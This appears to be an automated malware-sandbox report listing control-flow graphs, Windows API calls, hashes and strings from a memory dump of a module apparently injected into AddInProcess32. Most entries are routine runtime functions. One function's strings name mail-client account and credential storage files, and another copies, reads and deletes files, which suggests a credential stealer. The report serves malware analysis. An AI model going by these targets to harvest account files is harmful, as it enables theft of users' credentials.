                                            control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 298 10007df0-10007dfc 293->298 299 10007dda-10007ddf 293->299 302 10007dd1 294->302 303 10007dbd-10007dc0 294->303 295->296 304 10007d1c-10007d2e call 1000571e call 100091b8 295->304 296->277 298->290 311 10007dfe-10007e0b call 1000571e 298->311 308 10007de1-10007de4 299->308 309 10007ded 299->309 302->293 303->302 313 10007dc2-10007dd0 call 1000571e * 2 303->313 304->296 308->309 316 10007de6-10007dec call 1000571e 308->316 309->298 313->302 316->309
                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                            • _free.LIBCMT ref: 10007CFB
                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                            • _free.LIBCMT ref: 10007D1D
                                            • _free.LIBCMT ref: 10007D32
                                            • _free.LIBCMT ref: 10007D3D
                                            • _free.LIBCMT ref: 10007D5F
                                            • _free.LIBCMT ref: 10007D72
                                            • _free.LIBCMT ref: 10007D80
                                            • _free.LIBCMT ref: 10007D8B
                                            • _free.LIBCMT ref: 10007DC3
                                            • _free.LIBCMT ref: 10007DCA
                                            • _free.LIBCMT ref: 10007DE7
                                            • _free.LIBCMT ref: 10007DFF
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

                                            Control-flow Graph

                                            APIs
                                            • _free.LIBCMT ref: 100059EA
                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                            • _free.LIBCMT ref: 100059F6
                                            • _free.LIBCMT ref: 10005A01
                                            • _free.LIBCMT ref: 10005A0C
                                            • _free.LIBCMT ref: 10005A17
                                            • _free.LIBCMT ref: 10005A22
                                            • _free.LIBCMT ref: 10005A2D
                                            • _free.LIBCMT ref: 10005A38
                                            • _free.LIBCMT ref: 10005A43
                                            • _free.LIBCMT ref: 10005A51
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

                                            Control-flow Graph

                                            APIs
                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 1454806937-0
                                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 389 10009563-10009565 382->389 390 1000953f-10009542 382->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 394 100095a1-100095b7 WriteFile 391->394 392->378 399 10009560-10009561 392->399 393->378 396 100095b9-100095ca 394->396 397 1000962a-10009630 GetLastError 394->397 396->378 400 100095cc-100095d0 396->400 397->378 399->391 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->397 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                            APIs
                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                            • __fassign.LIBCMT ref: 1000954F
                                            • __fassign.LIBCMT ref: 1000956A
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                            • String ID:
                                            • API String ID: 1324828854-0
                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 427 100033f9 419->427 428 1000340d-10003414 419->428 421 10003400-10003405 420->421 421->417 424 10003407-10003409 421->424 424->413 429 1000340b 424->429 430 10003443-1000344c 427->430 431 100033fb 427->431 428->418 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->421 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 434 10003457-10003466 call 1000bbe0 433->434 442 10003483 434->442 443 10003468-10003480 434->443 439->440 442->432 443->442
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                            • _free.LIBCMT ref: 100092AB
                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                            • _free.LIBCMT ref: 100092B6
                                            • _free.LIBCMT ref: 100092C1
                                            • _free.LIBCMT ref: 10009315
                                            • _free.LIBCMT ref: 10009320
                                            • _free.LIBCMT ref: 1000932B
                                            • _free.LIBCMT ref: 10009336
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 491 10008862-10008886 MultiByteToWideChar 489->491 492 10008857-1000885f 489->492 490->489 500 1000884e 490->500 494 10008a19-10008a2c call 10002ada 491->494 495 1000888c-10008898 491->495 492->491 497 1000889a-100088ab 495->497 498 100088ec 495->498 501 100088ca-100088db call 100056d0 497->501 502 100088ad-100088bc call 1000bf20 497->502 504 100088ee-100088f0 498->504 500->489 506 10008a0e 501->506 516 100088e1 501->516 502->506 515 100088c2-100088c8 502->515 505 100088f6-10008909 MultiByteToWideChar 504->505 504->506 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->494 519 100088e7-100088ea 515->519 516->519 519->504 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 526 1000894c-10008966 call 10005f19 523->526 527 100089cb-100089cd 524->527 528 10008992-100089a1 call 1000bf20 525->528 529 100089ab-100089bc call 100056d0 525->529 526->510 543 1000896c 526->543 532 10008a07-10008a0d call 10008801 527->532 533 100089cf-100089e8 call 10005f19 527->533 528->532 541 100089a3-100089a9 528->541 529->532 542 100089be 529->542 532->506 533->532 546 100089ea-100089f1 533->546 545 100089c4-100089c7 541->545 542->545 543->506 545->527 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->532 550 10008a35-10008a3c call 10008801 549->550 550->510
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                            • __freea.LIBCMT ref: 10008A08
                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                            • __freea.LIBCMT ref: 10008A11
                                            • __freea.LIBCMT ref: 10008A36
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                            • String ID:
                                            • API String ID: 1414292761-0
                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                            APIs
                                            • _strlen.LIBCMT ref: 10001607
                                            • _strcat.LIBCMT ref: 1000161D
                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                            • String ID:
                                            • API String ID: 1922816806-0
                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                            APIs
                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: lstrlen$AttributesFilelstrcat
                                            • String ID:
                                            • API String ID: 3594823470-0
                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                            APIs
                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                            APIs
                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                            • _free.LIBCMT ref: 10005B2D
                                            • _free.LIBCMT ref: 10005B55
                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                            • _abort.LIBCMT ref: 10005B74
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_free$_abort
                                            • String ID:
                                            • API String ID: 3160817290-0
                                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                            APIs
                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                            • API String ID: 4036392271-1520055953
                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                            • _free.LIBCMT ref: 100071B8
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                            • String ID:
                                            • API String ID: 336800556-0
                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
